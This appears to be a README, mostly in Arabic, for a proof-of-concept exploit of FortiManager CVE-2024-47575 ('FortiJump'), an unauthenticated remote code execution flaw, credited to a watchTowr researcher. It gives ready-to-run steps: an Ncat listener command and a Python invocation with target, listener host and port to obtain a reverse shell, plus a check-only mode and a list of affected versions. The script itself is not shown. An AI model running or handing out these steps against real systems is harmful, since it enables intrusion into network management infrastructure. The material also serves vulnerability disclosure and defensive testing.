Fortijump Exploit CVE 2024 47575
1.0.0
Fortinet FortiManager تنفيذ التعليمات البرمجية عن بعد غير المصادق عليها AKA FortiJump CVE-2024-47575
راجع منشور المدونة الخاص بنا للحصول على التفاصيل الفنية
للبدء، قم بتأسيس جلسة Ncat الخاصة بك:
nc -lvvnp 80
بعد ذلك، قم بتنفيذ مولد الاكتشاف الخاص بنا:
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
للتحقق من الثغرة الأمنية فقط، استخدم الخيارات التالية:
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
تمت كتابة هذا الاستغلال بواسطة سينا خيرخاه (@SinSinology) من watchTowr (@watchtowrcyber)
للحصول على أحدث الأبحاث الأمنية، تابع فريق watchTowr Labs
